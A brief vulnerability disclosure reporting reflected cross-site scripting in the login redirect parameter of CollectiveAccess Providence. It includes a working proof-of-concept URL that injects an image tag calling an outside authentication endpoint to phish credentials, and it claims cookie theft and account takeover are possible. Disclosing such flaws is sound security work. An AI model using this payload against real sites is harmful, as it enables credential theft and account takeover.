Cross-site Scripting (XSS) - Reflected in collectiveaccess/providenceValid
Sep 29th 2021
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites
Proof of Concept
// PoC.js POC --> https://demo.collectiveaccess.org/index.php/system/auth/login?redirect=http://example.com%22%3E%3Cimg%20src=https://httpbin.org/basic-auth/user/passwd%3E i user can steal credentials using a login form will display
This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .